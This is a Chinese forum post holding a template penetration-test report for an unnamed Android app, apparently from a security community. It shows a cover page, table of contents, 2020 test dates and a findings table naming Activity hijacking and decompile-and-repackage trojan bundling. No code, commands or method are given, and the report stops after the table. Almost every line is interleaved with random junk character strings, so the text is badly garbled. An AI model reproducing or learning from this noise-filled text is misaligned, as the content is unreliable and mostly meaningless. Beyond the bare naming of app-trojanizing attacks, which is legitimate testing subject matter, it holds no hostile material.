找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4356|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
6 P6 E1 t) ~+ z) [! C1 n " M& D9 S! P/ z- K! A; n

s- h0 x2 T6 o4 k) I / w0 n$ @% S1 @, N, Y# O
0 M: D1 o% D( z/ Y; I2 u& x & g! T3 T) j7 L; u6 b) v0 [

3 N# J2 I. a' b/ Y1 P" {. R0 E& p, c' |
5 N2 m l; G" D, H3 @ [& r4 ]: o+ N& ?

6 Q1 `) l) L$ {( N$ @* X# C; ] / u9 T( f7 E: ~1 p/ [ 文档编号:                2 `! w- ^) j! G" {* q! H& S0 E2 B' h' U) L2 P" @* P: R- N

. {6 I. H: r+ z1 v ) z6 L* v- O& O" D

. s' B" W0 l# K, a4 g6 N' c! k" E3 F5 M4 r   8 i& U$ X- B, N5 m5 ^6 e7 x $ {% F# {. t! L( w0 L1 x5 A. {

& Y( k0 V. m$ B2 |8 }& Q0 h+ H/ D; `, ^5 X! c" n8 f

# L* E. f, T3 ~, n. Y6 E) R! ]! ^6 x$ _ N* S9 A   7 k3 d9 I" c( A" u* N! X$ o6 z w$ E2 c4 R( O

1 Y8 o$ j" M7 J9 U* X9 \% r 6 j5 ?+ X. \+ k# @3 J

" {, Y7 Q1 k6 `7 b! T- j 3 p# t+ K" \2 K3 s   ) c6 S; g9 P* R/ ^ 0 u0 r k! w4 B) O) p% g2 L

5 d# x. a. D9 Y( l' v6 s( A2 [* [2 Y, l( ~3 T& K8 \

, X& k5 f3 S# M+ Y 9 i/ d- y: ~$ x/ z   0 l% S) Q" c% a8 @5 k$ s : q) {' u0 P6 _2 `8 o+ n' f: ^/ m a

. _. |0 r- {: _ z0 X: v2 L$ Y) A6 s

/ [ y& A8 h( Z ' z, Z: T7 }6 S   9 v3 |/ S0 f) w9 F, c' V6 Q" C9 @) K

5 n. [/ B* B, R; k 4 O# z5 X9 D: w. s" D, D

/ x; B8 d( ^, {. B , p2 t) |6 e5 ?* q6 {: E 某某某APP渗透测试 ! l& K# D M! W5 B5 g+ @ , a( D7 W) u: Q% ~8 Y$ d5 Z

0 E& g" n) E+ k+ { ( c) G# R' B7 t' t" k0 U/ T4 n

2 @& Y, j: p2 L$ g . Q, `3 ?" r+ s/ j   + |7 G0 D; R5 C5 ~% |7 Y! K2 g: f " H3 W/ F( n6 g9 [

( f; R1 o# x9 r! t * t- f' t! z. t, M

& D5 r. a: [8 D. V* v* b l6 T/ ~ 8 S! s3 h3 g) C# R. S; R$ W7 b9 A' t   / J% F2 G. d* H2 i! \8 a 2 U% ]/ J6 h" e- i3 C2 e7 D

* Y. D) b+ o- ~ ( x+ D8 I# ?7 D

5 D/ a' r( G! p9 M H4 K ; w; D1 H' h( v/ r- n   , `. l( R9 T/ d: R* S" P& e ; G2 _$ q; Z* s$ h' d

3 [+ J, M0 f5 ]4 ?0 o % g; f. Y3 a9 V+ h7 c+ v, Q

) a; M7 o0 F `0 E : Y( ~ o$ [% d0 }   ! ~6 @( O! @0 B1 u3 n1 I ! O. z9 z+ s: Z, w+ k

6 r8 z7 e- W' ^6 i " Y, @* y/ u2 b$ z5 ]

7 p; X% {+ a @0 M' A9 ?' U ' X! c# N4 L$ n8 C6 g8 w 技 术 报 告 L2 a4 n9 t8 t+ [9 B d1 w0 ^4 I/ R- B, [7 ^

9 e( J' E7 { i( p8 M/ n 9 V0 D- r$ e9 B% Q. Z! Q2 Z' M

" I& m0 x4 W6 W. e, Z9 E( i7 l; h0 }1 B7 [5 |2 R   " m5 V% ^( l/ ?7 Z* F0 L 8 O1 S4 Z! y% Q3 I2 N

' [/ A9 e5 d' c; s$ U ' A4 v: ^: o7 d1 t/ I8 e9 S# {) z

! c) M3 x3 F5 y $ ^6 b3 t. n0 t2 k- h6 ~   8 q: k5 G6 b3 v/ o 0 @7 A, D& r, |9 H9 m

" I* i" Z: r, X+ @' E2 m5 U$ _! x 6 U* t. J! f; a1 I

J. m9 M J' M/ S! R # W; `, s2 q+ x9 R5 z2 d   $ U! h/ j3 N* w4 t1 V# G5 G 9 g, G6 _8 |- ^

& B ~) C+ j: A1 O# | 7 V( X: T0 K4 F" a, s* |9 L

$ k5 j: a( t9 r) `" m, k! o, { 1 [- N9 |' c# @3 s; E3 z) v   # D# c1 G) @- w/ J0 N + d9 i+ t7 ?8 y' z: ~, z3 P

) K+ m( @" \* X* n) a6 x- | # v* z8 ]; k( i `& M8 Q& u" y+ [

* C6 y, v8 v4 ^! p, ]8 V$ X; N. d9 Y4 Z   ) ^- n- Q( h2 ]# i; ~ & B1 n' `8 i% X! p

* G7 b" i. `& ]% B + I% e6 \$ z* M8 i, c& @

6 R9 F* X5 m$ R + Y- I% ]* y* W" y6 ~   2 k/ A/ k3 N+ |1 f: ?3 y - x4 d$ E2 F8 d4 @

4 o$ o; T, p8 Q1 M% f 3 m& F% U5 U! U9 Y

$ k6 Z8 \5 J$ Q' L 9 y* t, S+ P- h8 ~   7 h1 H* c( ~) h6 U$ [" r) s5 m: i5 `: l

- g) x' v0 Z; f) W5 Z: I$ b1 L* Z8 f( B$ o8 y$ J# U. ]5 ]- n

# y0 |9 j2 A l+ C4 Y ( I8 d7 x% d- a, a   9 G& h6 t2 k1 {; P' o 1 z. c4 e9 H8 l

% N# ^* M' i( z7 P: q. _$ O: X* ~( z: t

! ?) m# k. n0 P2 o) l @7 b1 c4 u: d7 I2 a- k8 F4 v% N   & d: w$ Q; `4 A0 { 1 M. C/ P D) i: @" P( D

% ], o+ `' n& Z- W8 P ; E: E7 a2 x/ z

# E @/ h' K, \' [ ) n# n( |4 _5 Z# K' z) B   1 n; p9 z" F' u, o9 @* D $ r( N! m4 a% N5 L/ B

% J! d; a9 z9 i) r5 v7 S . V4 g# x/ w2 T

9 Q) a+ @1 N+ x% P 7 h# E" K t8 w* J2 F9 ~7 E   - D X2 A( ~, l* {: C- c7 {/ ~5 ?8 J

% N5 `. \. T4 g3 j9 A' b9 P % N d& n5 a+ ~; x O- C7 n4 v

* g! [! Q; c$ ? Y- _ ; ?* R1 k9 j- Z% L9 U   ; F+ d) m9 Q/ {9 v! c $ T( r; B# e' y! J% n& d' N; {

& [" i M V/ f/ S, }/ j4 p4 }! C6 u" t

) ]- b8 _% t9 s r5 ^- e3 c ! l" X; ~* K8 p" G   / G2 i8 Q. Q" T ; g# Z8 G$ [# i4 H* t6 m7 f1 _% n

7 D0 z. A8 G: w1 ]2 y) m; u+ V2 _8 A# J1 G

7 D, {6 X8 R/ e! ^" h: Z , k3 D2 g. t) d" `0 x   : l& N4 D; m$ G7 s, y 3 ^8 a% P* }) v; p

8 s) g" v4 n6 V' h! K7 D: Q' Q; m# t |7 v8 |

% F+ D& U1 @) Q4 A8 v, U8 j ' ]8 r/ m9 K8 Y6 {# u) V. S0 } s   ) a4 n/ ?/ Y) b0 D. p$ U 8 X) M+ P. d2 m/ }, F/ ^' }& k

' W1 ~, b! m; \$ M5 C - m# P5 x' T! B8 g* X" P2 L- l2 r' p {

8 r: ?5 `5 e% N" I B1 d* [' }7 v T! r   $ j: p0 f( _( p4 v# G7 W# K1 q ( g1 F" j3 V o) f3 P1 ^8 F! Z1 |7 u

3 x+ x1 u2 j' B" z5 S$ Q& K $ M8 _- a5 G8 Q* P" h

K( m; K7 m5 i! Y " B2 t' v9 e, O7 r1 N n* C   + t6 y4 X: c2 c ; ~% \0 ]+ O8 L- |6 r' D. }- }; D

2 R9 n3 f$ j5 E9 u2 W3 { & f& g l2 x& v& `* u; ?

$ u4 b! I+ z$ a% p $ J$ U$ {$ j. G& p   ! P$ j, Y N5 e, ~5 x9 C$ X% s 6 }, Q& J2 ~# r6 Z3 b

! s; ?7 }1 z" x8 x6 U 1 ?: T: X- x9 A; m% F( Y0 H. C! w

/ L" Y. h5 _( {3 c& {/ A! I) c, q1 Y3 A( ^! l( R3 n4 ] 二〇二〇年 , u; S( ^7 Q% y. L0 {+ e 9 P6 D" U' I3 ^4 r* w% G0 m

, U4 Y1 n2 C( M5 \# p 9 s/ P' K) T5 g3 {( ]7 z! I G9 k
- s. A- a& p2 L, s8 y5 `) k5 t6 b2 B! {
% N/ @6 n* N9 N) Q( a6 J+ o. F # M5 @, u' c4 C/ f. ?$ ]: _
0 L0 x# d" ~7 z' V, K: s8 U 4 j) L, p$ N- h' }5 W7 i
$ }" S0 X( K# l 5 z6 ^+ r3 t4 F* M3 v0 C) A# `
, i X3 Q" c: ^& H) [ ( [1 \7 p( ]% l2 |5 Q! X
2 I% H/ I- a9 ~ ; |6 V+ E# y3 ?/ b) R
8 w. ^, t7 v( y4 C% j6 R1 E + K! f( |8 c8 ?. N
8 {% P6 Q3 s' z" t) \/ z" [ " V! x; L3 y: f- k* X L

: K' Z; m/ D$ s: y* x! n% a' x- i8 ?* N 目 录 - d8 d* [* y0 q1 x4 C" g; W V8 H4 C7 R6 i5 W+ S1 J$ f

5 Y& D- H9 P" Y' K% q, O . o& f( z9 U8 |2 `0 Y 1 M% }8 M/ y$ `4 S5 x l # D# i4 M j6 p( U) ]: b& a

5 @% R( B( j; W$ S ? # r+ }' ^) t) G5 l+ U- l* l   1 n5 }6 J* |4 E$ H9 G 7 }- `; x9 |; w# ^: z7 E4 `$ g4 _/ ^& V

& ~4 {8 {7 g- _0 W5 Z2 k* M! E0 M7 B/ w# J5 A

8 P$ C' U9 A% r & ^ n2 d. U2 d/ I2 ^$ D 1 概述... 3 1 ~5 m, Q5 i- ?( \ @ ' b& p" l- l' M1 Q% ^

/ A) F4 [+ c2 ~% z$ L- V - c: g, D% J: }% d! d# ]" `

) \" [& e3 a, Y' l3 r* r , k5 P! K4 w) \" k/ G# p: c 1.2测试时间... 3 ! l+ o4 s( E' Z$ o. J) x , f0 d1 c3 i7 p0 b z. o, r

) G; Y1 d1 `. [$ r2 Y. n2 T, M! r3 D& [

+ Q( ]" e* Z R - e J5 R7 g9 ~( D5 Z g 1.3测试对象... 3 0 F: b# g8 C% G4 B# _2 r ) C+ f) q8 ]# u; F6 d$ T: i: U

! ?5 s7 q: p( ]0 i * Z" k& j) Y6 ^5 V/ x( c* N

7 C/ e, S3 \" H9 b- v! |6 E( X ( d2 k& G3 v9 `$ i, c: n4 F 1.4测试结果... 3 3 u1 B( C6 |* W* @* ?( T ( K5 n3 J1 U' c: y- h7 c

3 }9 t- |. w, X0 ^ ( q' k6 `0 [) _. M

0 Z, Q0 ~) O9 T q; L6 \6 J8 b, L' O2 d5 t9 H 2 检测结果... 4 . L+ t% l% _# ~/ W" @* X. ^0 ^! V$ P! [$ R

' Z* l+ }( e+ D# v \, F 6 x! f6 _. @ l6 ` S5 v

3 N: J$ d9 C; _5 t: \9 C& a5 m ) v) [9 Y0 E) d4 U$ F 2.1 某某某... 4 1 `$ T$ f, I# [) b6 o 9 J6 _2 m6 r9 \& b

2 Y( G5 E' R9 }. I" x* m; F& o + w# f& p7 D7 a0 d

/ n( q* A& S8 T0 \8 {' U2 K P* ?' _# v2 _+ T# }) Z H 2.1.1检测目标... 4 3 ?- \: P Q2 U* J0 b( i' r$ _+ {, Z

; c" O5 Z" S/ G/ ^ I% u0 r/ ` : `5 u/ b* f, N Q3 H( O: p0 X

. i3 e& Z/ A: U! c8 h 2 B6 B" t3 U5 G 2.1.2检测结果... 4 , B0 S. V' G+ V1 ~ i$ J- f) b ( w7 x0 a. J: V% f7 i2 `

7 l2 N( W \: x0 M7 ? 4 O2 Y$ P9 U* J. Z

1 q2 ~0 [$ }7 q$ y. A% T9 V) x / m" Z- p k5 r9 |' A 2.1.2.1. 4 3 R' m* i4 a& P0 Q : |& [2 M0 ^: V2 g8 m

& V5 }* s) I. S' ]: L 8 O# U" e6 V3 E/ _+ `

; S* W1 @ [/ I9 S/ | - S& J ~+ i$ D' a( n4 X 2.1.2.2. 6 % ~9 v- u, s8 `7 S; u; [; |4 L- D( j3 h% E4 R

\* b- \: }& K" L+ W$ q3 |0 d: b& @5 `# L0 }6 F+ h( G

6 n( g8 d7 C+ E 1 l" H0 l1 X2 P$ c/ f 4 H9 \; `/ T7 {/ ^4 `+ Y) l * M J; i9 Z5 Q2 y" N, V

! v) P1 Y9 r6 Z8 h# y# s 3 a: b. L! G1 K& x! @, i* }
# ^! N% Q9 P3 V3 a 1 m* e" }2 R& R" g/ n2 \& `
; B: e6 f' x- z) } / r5 h/ r0 v. y7 i* F6 v
- ]3 D5 }4 }. a( ]; E 1 X( ~5 }6 T) O$ O
% e& `' M) G y8 H* X2 a ` & X3 R8 l! p) m, G( i" t

4 S n( M- h) t ?$ \ # ]8 H+ F; i7 l1 P5 X 1 概述 4 b# Y$ ^4 t% ]- C; l) R' ]# y1 U) k+ J3 `! H1 m2 f( X' c1 I

) H& |1 \9 F& j. Z: d# n+ A F# _0 K

2 u! D5 b' T9 | W3 `% m V+ v ; \7 p8 S. r# X 1.2测试时间 " r" n" I% Y3 V( |7 A% L0 J1 r- @' J Y. g

`! _4 y. [. Y3 o7 Y) B ! U1 J; a" R4 P0 v- q! Y ( o( X1 z4 |) s0 V8 |) v3 `4 i9 \! J) c9 }. V* L8 O& T; a$ D. `& t, H. C" G2 b* o1 l! E" L4 E/ ~- G+ j$ Q; u5 K1 _; U4 C2 l) H& W) ?2 X4 q, l0 N2 L$ [- {# O, d/ C T9 w5 Z% k: s8 u% D: O9 _( i& n/ j' {: ^# z. V9 Q. u( H9 {/ G( `- s' E/ C( D; R* f( O1 B0 ?0 z/ e9 p: V4 R; f- P, E' ~. \* Y6 w# V0 K% n! }+ ~( v" i" x0 O; Z: F5 H* j+ P% l! p7 t1 G8 x4 ?% C, L0 Y; \' j O/ B I* Z$ \2 l: _8 i3 Z" j' m; U U' p7 H4 K% o4 T0 v/ G1 \5 X# `, W' m5 j7 k7 n5 M# @$ _: A- b- U M }* H: j' ~6 _, _% a4 L) [3 u% [/ _( u- q$ _/ C. p. D7 V0 n, I1 I8 h8 o2 z+ |0 K- D9 q3 I; w, Z. E& g- g9 _4 I X2 c' P& S: q+ x+ j" @/ \+ K0 @1 ^2 X9 s$ h, G5 ~: K3 Q$ P( a4 Z) R3 {) h5 o: g, j/ T
3 D3 h: h$ r8 n, } * m- V+ C: B7 h' P8 C; K

. w' w9 s! I$ Z( ?" o/ U# e4 a) H, j# ]& J 渗透测试时间 & Z: a' V9 b& L3 Y, V/ t1 o . v6 V1 y) g+ e* {% N

- L1 Y; e3 T2 k& B- g6 I , d" X Z) R9 i
* c; w9 V* L2 P# E; U( L5 C9 n N9 o3 i. \( U

w+ B5 n, P8 G1 l, t ! o: }2 c0 |: ~0 e& x1 l 起始时间 ! o7 v- f0 j# N w5 [ ' |0 S" p: H) r* e- P1 [

$ p$ y4 [. [0 {5 P1 e i3 ]1 p) o4 c. c* P6 i9 F
/ J* Y5 V/ C9 n, z 7 H% @! }; g" o; f- k2 e6 |

: t h# ^7 D. _. j7 C i" w4 }) D# x/ A 202046 9 j, F0 O; p1 k+ W & |/ T% a% s$ {! N. _

# s4 K6 o! c/ F8 W" K& t- f# W " y# x, ]) F l; |
, L: q- V5 L$ `0 [% ~! J* Q+ U, {. J

x: \' u) w- p0 |6 v & v5 A( X3 k5 \. ^3 w/ F+ W 结束时间 + S& G% t" n& J2 [- o ! `5 C3 S/ T ]+ F+ V6 z" v/ U u( J

; W' v) t! U# q1 ]3 B4 P; b4 ^ " Z" Z& y7 g* m' M
0 S" [, w2 B6 i$ x * { V2 J4 K" M$ r, k8 \% I% Y

; K7 u1 k% i5 R2 y! _ $ _$ V; S1 {8 B8 o. d5 a 202049 9 z. c9 l, O! X& }$ ? h) d 3 }) H6 m6 K- u# @

2 i f( ^9 i9 D- ?2 @2 p, e ! `% d/ v/ O+ M2 u: s
' Y+ P" V$ Y, h- s) Q 6 e3 R2 \+ Z! v" ~1 ?+ A

6 ?& c4 ^/ I( B" N1 j7 _4 T0 |' f$ P5 _ 1.3测试对象 1 u# j% T. p6 N8 ~! x3 c& v ) h' Z+ {% E, U& o: R

9 ^: E1 H6 b$ N3 W( t - x0 m3 W" f* S' d+ A$ j7 B3 z

/ E) T7 h* C" Z# ?1 F$ k 0 m* L, X. b) ~- Y0 g! C 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 3 _, g6 a! n; u* Z7 ] , Q% `. |9 ~% j( y

: y4 E/ u+ x. _& b& q, A |3 G* R " ?7 C; {1 B9 Y$ R' v$ d8 b

. B( D. B5 P; U/ G ^5 y% h9 k$ ]4 x5 y6 _ 1-1 检测对象 . q& W$ ~+ Z! q3 a8 m( q - Z! A' e) q) S4 G7 Y

0 ]5 ^, y( I4 x: x% J; i* \ * o' U4 U7 t% k. V" G7 W2 B " X. h3 c# }$ L; V: k8 p) z0 G3 ~/ ^0 Y! R3 }9 S1 j' h5 A6 z% {- ~" {8 W/ r8 }5 E, j7 L, @# H1 ?+ B9 `7 u& R+ p/ B) T3 Z8 v1 X# z, X0 Q: w/ G) b, P( B; C& [$ X. N5 i$ v: R N' z8 D6 U' j% ?' K a7 w+ Y. C& w" b. S$ |# r1 x2 p' }* ?6 ?$ {8 v0 F- t- ], {8 \+ N" k/ b/ r0 Q2 s% E9 d% a" O8 o1 v t" G' S& T+ S6 H2 {4 j6 W* s' m1 E; t! F+ g2 b$ T" q8 x* o( Q# ^+ [4 u- c! I; d7 s# }: B# i8 I1 n$ x+ s4 g3 E( P! z9 U; r& d* A( ~$ n7 y, X5 `+ f r: H8 s' ?( H# K* C: Y: [8 e0 m$ R% Y( H( k" ]" X+ [# o3 Q. v( Z" L+ j$ {( D, I' U% S# @1 b7 X6 Z9 b2 ], g# L0 _) ?8 I- ?4 s- h6 C9 L2 g; O8 u) l& W. L4 O3 g$ l) r! u! R6 n% U" }, B3 }4 F5 Z# G- }0 b% D& u4 @; i1 p) s' ~/ f T3 t$ d9 V8 {) H! C4 x+ b- ]
+ N m; Z, U; l0 K 9 j J! [% R4 f% O4 V+ a; l+ I0 E5 b

) q; y; J9 E& l8 i+ q ( s4 m2 a8 |0 I3 ^! {& b 序号 % Y% ^% z& P* e' O s + E0 }7 j% G9 h- }1 z7 C7 b+ ^3 Z& U: \4 ^

9 \8 J' y0 m/ `. i# k 5 @7 {% D7 G' ?7 ~$ \- e
; | v3 W1 k3 f1 S: n" y ) t8 ?' I* N" q( m& M

4 D, B8 f4 f w 6 N& s3 N2 B+ d+ h4 `& ?( I 测试对象 , L! B- [$ a; c! ~- H8 p R # w/ n/ h5 X# N( R# q4 v8 D7 M

1 G: k' x! o4 F1 r. S 4 y8 W$ c h2 Y- ]( P' u
+ p. i9 s2 z+ B/ @4 {% V O5 u8 J1 z" }/ N! h* T

9 o+ J. R) m$ m G- W! { - u* _0 b( z3 W6 m) y$ T 测试地址 8 m9 t/ A& t6 S! | $ w1 _) a! c* t& r w, A0 l

( P* \$ R- F- `* \$ U 1 ]: l4 Y' |/ z' V
* d! N+ f( T3 q, M3 G% `) ~) S5 E( K; N. \3 c: M

* q* ~8 I0 G* e, [2 }0 d* x3 q. e6 C# I - a+ e- z/ b1 V0 Y3 x 安全漏洞 / B: |+ o1 V$ H+ j. o# x2 Z5 Z# E* @8 V* q9 f

' w, }* Z& s n' S* ^0 A ! \8 ]& A( h4 o( G9 g
( {( y6 D1 f) J/ G$ { m- u5 l/ e$ d3 z: n" h' B/ Z

" P7 q1 e1 I; E% Y' S; B! Y3 q0 B9 ]/ y 1 ! f; L6 |2 L4 m, b+ p6 ^ B8 r W# O! x" G1 ~

6 S, O. B8 g8 U+ P2 b' r8 x: x % r. F Q8 g: Z
1 ^2 F3 }8 ^) A; U/ Y! b ) ~9 M9 b$ ^" [$ d

; M# h; L% _; \6 f4 T u 9 P% G- A, F( A; S' ]; ]- j 某某某安卓APP , @- j6 \2 Z6 ^% m+ Z. a9 T4 ^/ \& G0 p

2 m. `* J, s( X) ?' ~ / C* g5 c% a( {0 ^
$ L4 O, m' g% G, g; \6 A0 K9 ]. l9 j2 h/ Q; i9 \/ P

4 J6 z. ?2 e$ j- }2 K& N 5 a" A6 O" ]! `+ ^. s+ @/ w   / w8 a9 A) B# Z; i; G {" ~! h& U- n( V7 q

h7 x' N! t" U: ~# z9 P " I/ _1 a7 f- v/ I# O$ C: c+ p
* |2 R: a# H8 r: } % S; u: ~# ^) ^7 C* t* U! w# h( p, N" }

. R# ~. x) c. w8 u 9 p G9 V0 i, S4 S6 k 2 $ A# r. n2 d4 e1 w & P0 U6 ]$ j v, o. _ G

7 y- e/ y( H$ ~4 f4 ?# }% }" n . [( k3 X9 y. s# M2 c0 i; N* a/ }
, W* y& w$ N" \. c . X" r! O% L8 J, k1 t1 V

8 @+ A4 Y% V+ ~ ~ E \0 e l* r* m( W. p/ j4 x. r 1.4测试结果 0 R8 V0 T' H) `7 c* z2 O* X" ~" W& X

% D1 ]- y0 e, P, o ) k! R9 B3 ?& H0 i) l- J

0 U5 S1 z/ L. |" J+ _! |1 x2 t* |5 I& n% `2 f0 u* Z' s$ e 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 5 B4 R% s. o' t6 T0 l! x x0 m# u1 k6 i, l

: Q3 }, N) a3 |3 s) T. S1 r V8 \- n' l R$ H% d( D- u7 V

0 a1 d' h, G7 P6 ]+ @. W( k + g8 o Z& W+ C6 y   # q7 f8 f& f! R( f! Z + q* X4 p ?1 T' ?/ q3 p1 p) v7 J" F4 ?

5 v v' ^/ b8 _3 b+ m. h) Z" f % f1 q) u F2 O' D8 s& U
, u' f% \ Z k% W4 F; b ) T( Z4 [% b, @, ] * y- {* I% S( x/ g4 ]( U, A* m6 ]6 Y/ Z: n% B1 P6 @4 l, ]3 L- _/ V# t8 d' }$ ?2 I. w. T. x) o q1 z! V8 v% N5 k0 J7 K; ^1 n' ?) h% F. Y: Q* P. m: |. w7 f* w8 N' ^% R. T% a1 e9 w9 Z% V7 g- l' G* \8 L) {. u2 ]! z6 v8 N" ~3 [7 k/ Q3 k1 U4 P% W, y7 a2 I. E5 A6 ]" e% W& ~# L, n* U% j5 d, C0 Z' Y) I0 x# v6 W8 W2 a- j0 @2 `* h( K5 |! i5 F( C2 B; I+ m5 } r; p* q& H) n% ^5 P6 p8 b8 {/ r" f+ ]. r6 t, J5 O4 W. s" \: J2 l& O. t7 \! b" a1 |; R$ W5 _" Y- c/ o7 d7 \! }4 j& t8 p( e, u9 D4 f3 ~+ M' ?/ H7 C5 p" n2 D/ N3 U& T( }9 `) c" h8 i5 }* K5 C5 G: `* ?+ V. A0 p3 t% T5 \5 |& A; h: U: L3 N( C3 u' y- Q$ d$ X2 G: x- q$ |* `% U5 W: B9 B i. y0 ~5 ]+ H$ G& w8 ]* O4 K7 n/ [- u% A- ~9 I, k- V9 ~% b+ g* @9 A6 Z/ a+ l! z4 r% Z8 Z6 l1 v( V3 ?! X* j4 M1 I! z; J3 b( O# W% c, Q, z! {" g- U! u! C7 T0 \5 p' ?% \! j: _' |# q$ J7 r9 `5 _! S& e3 s; \5 L4 i0 d) f. _6 W" n4 M& O; |$ g4 [+ }% Y6 { M6 J" f A+ C' y6 Y5 N: y" b6 W/ q! V5 f3 [+ q" x5 ^( I$ e8 y/ P/ x4 R. l# S+ |1 U* i4 p' h2 I6 I" ] t- E% k5 F9 {# b2 a) K2 h o$ E& A0 |/ N; J$ d8 V0 ?% A- w( @! _; @" V! w5 d# Y8 G! S7 E' F; o5 P s Y* n& ^
% ]& { W) s' W$ z5 q6 w# ^$ f2 `& b

4 p* n8 r4 b" W7 g; W; P 9 p2 w8 W0 O% e 序号 ! s! c; K+ W, H" W$ I) ~8 d7 Z# i 9 c! p3 t, W4 e# M

. S' ^$ }2 F! _. q$ u [4 ^& ]0 | 3 A3 [# d3 }( g2 `
, R- m/ ~/ E7 S$ U. ?* V4 T + B1 Q5 [( }2 u

5 a9 ?+ r- B& k3 K3 o ` / o; M& f2 ~: }, k! @( l z% D 系统名称 7 u0 |( @$ q0 R+ |$ U* O4 x 4 `; q, Q& i1 O

7 M/ u3 g' e+ p : S) m: L6 b/ ?+ {; j' w# r
2 t8 ~0 J/ Q3 q9 G 1 m/ T& O1 W0 l% f' b- X' k; u

. C) [8 @$ Q0 b" X1 t4 M6 x" b% i+ \ ; a. @# U- }! S2 p/ H 漏洞名称 0 f( l' Y4 Z2 n% E( v+ M0 b6 q9 d ' p1 M" W9 L" A W7 q; [1 S6 {" p

1 {/ S& \5 }7 z6 E3 c! N' ^! x7 a ( l. j. {* Z8 C5 p0 [* U- {
& V0 \' u9 W: _8 e5 P0 G0 f D 1 T/ Y0 N- M, c2 F8 I# w, L

& O3 n1 ~) ]6 g 2 L" J1 ]2 u8 `2 Q& O 漏洞危害 ! f8 f9 N% R2 S/ q0 P. {- W9 a& q( s* Y) z

0 ]; ~! p- {$ W: E/ @6 O4 [+ m! c, u 3 x7 c; F/ `- _( k
: n; S" |$ D6 \( j 7 e% L+ ]$ P3 p& d

! L* c \$ M, ^7 Z& f) I# z' x. G0 I. ` 修复结果 $ t1 A3 C" E& T& J/ w) Y" u8 t6 E6 j, {" Q

9 j9 |" _( G+ m5 j0 u6 [1 y ; W& J# h# J B9 S! C, z8 N
: i2 I! a- Y9 L5 ~% k( k2 {8 D. z) r1 E8 \! y1 y3 j

6 U- h7 f! z& I: Y. C) a " e8 @! W! V4 _0 m0 m/ q 1 7 P! }. h. |& G + A- C5 Y" j2 X- ]

' U) Q @1 O' A( G( n! F, l2 | / w/ W' ~- D( e
$ }: ^2 b0 B; S- l) P$ i : x: Z5 e5 C$ t3 @( N

4 X. V4 ]3 V v7 T# h* ~ : I; r& @. O8 i6 p6 t* o5 J1 Q$ l( I 某某某某某某APP ' I2 p+ ?5 E" u, R$ Z & L$ f" D, `: v- |% b U% w

$ Y" G5 ^ E: t, W& e: w0 Y8 j: |4 o* T
' t8 x) H1 V0 G: D$ r " n; @$ `; y+ C/ R; d: z2 z

( W/ b" P! X% J" M: L8 y& g , n9 h6 X. K; M1 G Activity 劫持 ! Z. w5 l0 c6 o% W5 X) ]1 y& n# c# x! S. R* a Q

: C# D2 E( h: \2 y) b$ f6 n8 X5 z% Z; t- g5 D

! L# h3 e5 g( }" ~) b 1 L; p. r* I8 @2 y   0 Y2 i7 k, p& |0 b 3 T6 @. ^2 i3 U8 K# S

0 \0 p* Q: k; n! i# M 9 ?; x7 a5 z4 }2 q* u
8 ]5 m4 a+ T* g1 D0 A0 { $ @9 j3 C. U" L& |% T: S0 {

; R/ Q0 x& b- [ - `+ |+ g" B8 Q( [& d$ | ! E3 g, O; k' I I1 l9 Q) j& y, B8 B* r1 c& x5 z7 H

" X5 C: A4 n! l5 j) t7 C7 [" t) {
a3 m$ h7 J% T$ z ! v; c+ W- o! _! \9 m, V

r9 r! n" u! C% N1 R ( F$ y& F3 m. Y/ o   ( `/ e$ r7 K3 ~+ y* ^" K, D& \- N1 p9 z: |1 m! G

: ?# ]; p# ~+ b) ?' X5 J 3 }8 N& j. B! U/ x. w+ k7 |: I) L
U7 K7 M- B7 P: O 8 L5 f0 U5 w+ h3 m

- Q" ~& ]( {+ `8 E, r+ \5 I( k) d$ A5 y, r 2 6 D. t8 X* M! d: \- W% p, ~ 7 D# k2 D. @* l" v& d% p

, k, O7 x; V3 N0 B' K d& d; B+ A ( I, {2 }# F0 e& f- o6 e
& r M% G! [2 B9 z5 C 9 q G) B; g; C( }8 q

* {, m8 b, \9 x/ f& b0 O& n) ?7 { 7 {' w- C# Q) J1 \; z 某某某某某某APP 1 t9 b3 H$ t \' }- ~% Q( ^+ e8 T5 L) h }/ ^' ^

, c' Z( D& T/ K5 b) {/ z; q- q 5 {' \" H; V4 F/ e% }3 h0 v3 ?
& i7 p/ T: l: p! Y# \ & \ O7 u$ D0 y- O

; z) o" z) B3 o# \$ Q P& s( v: R2 g! V0 B+ v* @ 反编译二次打包捆绑木马、篡改APP代码 7 Q/ u+ k$ E3 r' \4 q y0 n: ~ ' M, o5 N. |" V0 j1 f0 c

& Y. d. R2 Y* S8 b% b3 u0 o5 k 0 z- c# b; m! h9 h" L
1 y. {+ m% M6 F$ V, a 1 V& N5 x/ w# N& u9 o

+ I% Z) p# w; F4 f0 Q 7 |( K4 p) t% A( f% [ - \8 p4 ^* W; Z( ^4 n+ E' K* ~ 3 G. r" S" S6 b2 k. K

' G* K+ {. G- J% c6 I6 i ` 7 l2 @, `# {" t
0 \6 z4 h S* M8 {6 p0 u * E6 b# V4 U4 M

* ]4 w+ T+ B) L. p5 z* V3 p ( F; G* E* q3 L$ b. F0 N   " g" E1 u+ x" m5 @$ j. O1 E* w7 e R% x

; b, E3 q6 d8 P. m( _ i/ S N* I5 t$ c7 i: |- M. ~7 Q; T; C
( n3 `4 _7 x3 P- ~ 5 Y: z) G; p2 q, ^0 S
# g! i5 V$ i) v+ b $ N& J" O: u% H7 K. L1 u

& x; t0 q: z5 q3 H* z" N - h! u2 |- K# A2 b l2 Y   3 `( b7 N, \% @. q, R. b* n1 }2 ]! N/ u( o

1 c$ j4 q3 S5 @. Z% I1 {2 X) }. ` & b5 l& p: A, g+ f7 e. R2 |

9 k: _6 L5 M9 u$ S! K: ^0 p* |$ i2 V 1-2 测试结果 # t! H% u, b9 i. F) Q' K & O' C I1 ^: i- I3 [/ S

% Z) h. Y u# I2 w0 y ) `2 `- u/ f9 G9 z/ }( S1 b

4 ], I! O0 m) E7 ? 5 l. j' d6 c5 N0 z# _   + w# q# b8 a/ \, F- G3 | / K5 t; ?" v2 ~/ p N |

